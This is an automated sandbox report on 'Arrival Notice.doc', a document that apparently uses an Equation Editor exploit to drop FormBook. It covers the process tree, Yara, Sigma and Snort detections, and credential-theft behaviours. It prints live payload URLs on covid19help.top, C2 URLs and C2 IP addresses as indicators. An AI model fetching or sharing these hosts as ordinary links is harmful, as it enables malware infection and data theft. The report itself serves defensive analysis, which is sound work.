Edit tour

Windows Analysis Report
Arrival Notice.doc

Overview

General Information

Sample name:	Arrival Notice.doc
Analysis ID:	1435895
MD5:	11f7254f05c7b7f931284c6b90cf2d7c
SHA1:	ecadd711c7fc21009d53958e1d139819f9918f78
SHA256:	59dad890842120178c79a9d3b7947dac9bc9d1f074437fdbca765c1867534166
Tags:	doc
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Sigma detected: File Dropped By EQNEDT32EXE

Snort IDS alert for network traffic

Yara detected FormBook

Binary is likely a compiled AutoIt script file

Document exploit detected (process start blacklist hit)

Found API chain indicative of sandbox detection

Found direct / indirect Syscall (likely to bypass EDR)

Installs new ROOT certificates

Machine Learning detection for dropped file

Maps a DLL or memory area into another process

Office equation editor drops PE file

Office equation editor establishes network connection

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Sigma detected: Equation Editor Network Connection

Sigma detected: Legitimate Application Dropped Archive

Sigma detected: Legitimate Application Dropped Executable

Sigma detected: Suspicious Binary In User Directory Spawned From Office Application

Sigma detected: Suspicious Microsoft Office Child Process

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

OS version to string mapping found (often used in BOTs)

Office Equation Editor has been started

PE file contains more sections than normal

PE file contains sections with non-standard names

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches the installation path of Mozilla Firefox

Sigma detected: Uncommon Svchost Parent Process

Stores large binary data to the registry

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w7x64

WINWORD.EXE (PID: 2352 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)

EQNEDT32.EXE (PID: 1408 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

fredchungel99962.exe (PID: 1640 cmdline: "C:\Users\user\AppData\Roaming\fredchungel99962.exe" MD5: 3E42573B12F2ADBEFD9E6540BB9C56FD)

svchost.exe (PID: 3104 cmdline: "C:\Users\user\AppData\Roaming\fredchungel99962.exe" MD5: 54A47F6B5E09A77E61649109C6A08866)

CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe (PID: 3000 cmdline: "C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

finger.exe (PID: 3180 cmdline: "C:\Windows\SysWOW64\finger.exe" MD5: EEC4E983BADE61121F4FB56F347D9B6B)

CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe (PID: 2972 cmdline: "C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 3568 cmdline: "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe" MD5: C2D924CE9EA2EE3E7B7E6A7C476619CA)

EQNEDT32.EXE (PID: 3228 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/ https://asec.ahnlab.com/en/32149/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
Arrival Notice.doc	INDICATOR_RTF_MalVer_Objects	Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.	ditekSHen	0x15506:$obj2: \objdata 0x1551e:$obj3: \objupdate 0x154df:$obj5: \objautlink

Memory Dumps

Source	Rule	Description	Author	Strings
00000006.00000002.382596136.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.382596136.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2ea43:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x18742:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000006.00000002.382533799.0000000000160000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.382533799.0000000000160000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2b5e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x152df:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000E.00000002.457614450.0000000000080000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000E.00000002.457614450.0000000000080000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x47b1b:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x3181a:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000A.00000002.841509438.0000000000510000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000A.00000002.841509438.0000000000510000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x826c3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x6c3c2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000008.00000002.841357530.0000000000280000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000008.00000002.841357530.0000000000280000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2b5e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x152df:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000008.00000002.841245837.0000000000080000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000008.00000002.841245837.0000000000080000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2b5e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x152df:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000006.00000002.383628126.0000000001F70000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.383628126.0000000001F70000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a61b9:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x28feb8:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000007.00000002.841406060.0000000003C70000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000007.00000002.841406060.0000000003C70000.00000040.00000001.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a61b9:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x28feb8:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000008.00000002.841337285.00000000001E0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000008.00000002.841337285.00000000001E0000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2b5e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x152df:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Click to see the 13 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
6.2.svchost.exe.400000.1.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
6.2.svchost.exe.400000.1.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2ea43:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x18742:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
6.2.svchost.exe.400000.1.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
6.2.svchost.exe.400000.1.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2dc43:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17942:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

Sigma Signatures

Exploits

Sigma detected: File Dropped By EQNEDT32EXE

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1408, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\BE[1].exe

System Summary

Sigma detected: Equation Editor Network Connection

Source: Network Connection

Author: Max Altgelt (Nextron Systems): Data: DestinationIp: 172.67.175.222, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1408, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163

Sigma detected: Legitimate Application Dropped Archive

Source: File created

Author: frack113, Florian Roth: Data: EventID: 11, Image: C:\Windows\SysWOW64\finger.exe, ProcessId: 3180, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\sqlite-dll-win32-x86-3240000[1].zip

Sigma detected: Legitimate Application Dropped Executable

Source: File created

Author: frack113, Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\finger.exe, ProcessId: 3180, TargetFilename: C:\Users\user\AppData\Local\Temp\sqlite3.dll

Sigma detected: Suspicious Binary In User Directory Spawned From Office Application

Source: Process started

Author: Jason Lynch: Data: Command: "C:\Users\user\AppData\Roaming\fredchungel99962.exe", CommandLine: "C:\Users\user\AppData\Roaming\fredchungel99962.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\fredchungel99962.exe, NewProcessName: C:\Users\user\AppData\Roaming\fredchungel99962.exe, OriginalFileName: C:\Users\user\AppData\Roaming\fredchungel99962.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1408, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\fredchungel99962.exe", ProcessId: 1640, ProcessName: fredchungel99962.exe

Sigma detected: Suspicious Microsoft Office Child Process

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Users\user\AppData\Roaming\fredchungel99962.exe", CommandLine: "C:\Users\user\AppData\Roaming\fredchungel99962.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\fredchungel99962.exe, NewProcessName: C:\Users\user\AppData\Roaming\fredchungel99962.exe, OriginalFileName: C:\Users\user\AppData\Roaming\fredchungel99962.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1408, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\fredchungel99962.exe", ProcessId: 1640, ProcessName: fredchungel99962.exe

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\AppData\Roaming\fredchungel99962.exe", CommandLine: "C:\Users\user\AppData\Roaming\fredchungel99962.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\fredchungel99962.exe", ParentImage: C:\Users\user\AppData\Roaming\fredchungel99962.exe, ParentProcessId: 1640, ParentProcessName: fredchungel99962.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\fredchungel99962.exe", ProcessId: 3104, ProcessName: svchost.exe

Sigma detected: Modification of IE Registry Settings

Source: Registry Key set

Author: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1408, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings

Sigma detected: Office Macro File Creation

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 2352, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\AppData\Roaming\fredchungel99962.exe", CommandLine: "C:\Users\user\AppData\Roaming\fredchungel99962.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\fredchungel99962.exe", ParentImage: C:\Users\user\AppData\Roaming\fredchungel99962.exe, ParentProcessId: 1640, ParentProcessName: fredchungel99962.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\fredchungel99962.exe", ProcessId: 3104, ProcessName: svchost.exe

Snort Signatures

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.22 - Destination IP: 46.28.105.2

Timestamp:	05/03/24-11:34:28.808194
SID:	2855464
Source Port:	49191
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.22 - Destination IP: 162.240.81.18

Timestamp:	05/03/24-11:34:47.919376
SID:	2855465
Source Port:	49197
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.22 - Destination IP: 208.91.197.27

Timestamp:	05/03/24-11:35:39.407794
SID:	2855465
Source Port:	49209
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.22 - Destination IP: 66.96.162.142

Timestamp:	05/03/24-11:33:20.566188
SID:	2855464
Source Port:	49175
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.22 - Destination IP: 162.255.119.150

Timestamp:	05/03/24-11:33:07.336582
SID:	2855464
Source Port:	49171
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.22 - Destination IP: 192.185.225.30

Timestamp:	05/03/24-11:33:38.630331
SID:	2855464
Source Port:	49179
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.22 - Destination IP: 217.26.48.101

Timestamp:	05/03/24-11:34:07.305361
SID:	2855464
Source Port:	49187
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.22 - Destination IP: 46.242.239.47

Timestamp:	05/03/24-11:35:20.478938
SID:	2855464
Source Port:	49203
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.22 - Destination IP: 203.161.62.199

Timestamp:	05/03/24-11:33:52.951160
SID:	2855464
Source Port:	49183
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.22 - Destination IP: 91.195.240.19

Timestamp:	05/03/24-11:32:31.814899
SID:	2855465
Source Port:	49164
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.22 - Destination IP: 47.238.226.135

Timestamp:	05/03/24-11:32:59.169437
SID:	2855465
Source Port:	49169
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.22 - Destination IP: 162.255.119.150

Timestamp:	05/03/24-11:33:12.608470
SID:	2855465
Source Port:	49173
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.22 - Destination IP: 172.67.145.66

Timestamp:	05/03/24-11:35:54.469895
SID:	2855464
Source Port:	49211
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.22 - Destination IP: 46.242.239.47

Timestamp:	05/03/24-11:35:25.894742
SID:	2855465
Source Port:	49205
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.22 - Destination IP: 192.185.225.30

Timestamp:	05/03/24-11:33:44.028137
SID:	2855465
Source Port:	49181
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.22 - Destination IP: 66.96.162.142

Timestamp:	05/03/24-11:33:30.438067
SID:	2855465
Source Port:	49177
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.22 - Destination IP: 46.28.105.2

Timestamp:	05/03/24-11:34:34.210463
SID:	2855465
Source Port:	49193
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.22 - Destination IP: 91.195.240.94

Timestamp:	05/03/24-11:35:04.226489
SID:	2855464
Source Port:	49199
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.22 - Destination IP: 162.240.81.18

Timestamp:	05/03/24-11:34:42.420484
SID:	2855464
Source Port:	49195
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.22 - Destination IP: 203.161.62.199

Timestamp:	05/03/24-11:33:50.047007
SID:	2855464
Source Port:	49182
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.22 - Destination IP: 91.195.240.94

Timestamp:	05/03/24-11:35:09.627954
SID:	2855465
Source Port:	49201
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.22 - Destination IP: 203.161.62.199

Timestamp:	05/03/24-11:33:58.457671
SID:	2855465
Source Port:	49185
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.22 - Destination IP: 47.238.226.135

Timestamp:	05/03/24-11:32:53.522404
SID:	2855464
Source Port:	49167
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.22 - Destination IP: 217.26.48.101

Timestamp:	05/03/24-11:34:14.888435
SID:	2855465
Source Port:	49189
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://covid19help.top/BE.exeggC:	Avira URL Cloud: Label: malware
Source: https://covid19help.top/Ha	Avira URL Cloud: Label: malware
Source: http://www.5597043.com/nrup/?pX6dR=2at1c1MHk4LdsVUDX6VNCfiZAhfBXFznTyG93G2uP4ilKgyCyFz2SOnlOoLDNVe+GAWkq5GLoOyug5V+2NERvjVgTNNC5euwUf40sv0MPI9wPMaUWVPIc3sG3prc&tv=6TdD8B	Avira URL Cloud: Label: malware
Source: http://www.hggg2qyws.sbs/nrup/?pX6dR=cxIeN1iVhQqOwsowpzRnZtCznzKsqLvfdqpS9UswCbkbA/58Vi1sucBg6AEQyfE3zCqKK/TeeNcUyXGKguuzOA8pGaYO9UjuKGEJ7C/XCVyDdYvyJ7HtIExhgCVf&tv=6TdD8B	Avira URL Cloud: Label: malware
Source: https://covid19help.top/BE.exee	Avira URL Cloud: Label: malware
Source: https://covid19help.top/BE.exej	Avira URL Cloud: Label: malware
Source: https://covid19help.top/t	Avira URL Cloud: Label: malware
Source: http://www.hggg2qyws.sbs/nrup/	Avira URL Cloud: Label: malware
Source: http://www.5597043.com/nrup/	Avira URL Cloud: Label: malware
Source: https://covid19help.top/BE.exe	Avira URL Cloud: Label: malware
Source: https://covid19help.top/BE.exeC:	Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Source: covid19help.top

Virustotal: Detection: 25%

Perma Link

Multi AV Scanner detection for submitted file

Source: Arrival Notice.doc	Virustotal: Detection: 41%			Perma Link
Source: Arrival Notice.doc	ReversingLabs: Detection: 42%

Yara detected FormBook

Source: Yara match	File source: 6.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.382596136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.382533799.0000000000160000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.457614450.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.841509438.0000000000510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.841357530.0000000000280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.841245837.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.383628126.0000000001F70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.841406060.0000000003C70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.841337285.00000000001E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\BE[1].exe	Joe Sandbox ML: detected

Exploits

Office equation editor establishes network connection

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Network connect: IP: 172.67.175.222 Port: 443

Jump to behavior

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\fredchungel99962.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\fredchungel99962.exe			Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 172.67.175.222:443 -> 192.168.2.22:49163 version: TLS 1.2

Source:	Binary string: finger.pdb source: svchost.exe, 00000006.00000002.382575658.00000000002C4000.00000004.00000020.00020000.00000000.sdmp, CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe, 00000007.00000002.841270185.00000000002F4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe, 00000007.00000002.841357951.00000000009FE000.00000002.00000001.01000000.00000005.sdmp, CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe, 0000000A.00000002.841874386.00000000009FE000.00000002.00000001.01000000.00000005.sdmp
